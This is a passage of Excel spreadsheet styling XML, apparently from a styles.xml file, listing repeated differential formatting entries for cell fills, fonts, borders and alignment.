          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="6" tint="-0.24994659260841701"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center"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bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0"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bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="0"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bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>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outline="0">
        <left/>
        <right/>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="center"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2"/>
        <color theme="1"/>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left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right/>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
        <vertical/>
        <horizontal/>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border outline="0">
        <left style="medium">
          <color rgb="FFCCCCCC"/>
        </left>
        <right style="medium">
          <color rgb="FFCCCCCC"/>
        </right>
        <top style="medium">
          <color rgb="FFCCCCCC"/>
        </top>
        <bottom style="medium">
          <color rgb="FFCCCCCC"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="14"/>
        <color theme="0"/>
        <name val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="center" vertical="top" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="left" vertical="top" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1"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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color indexed="23"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
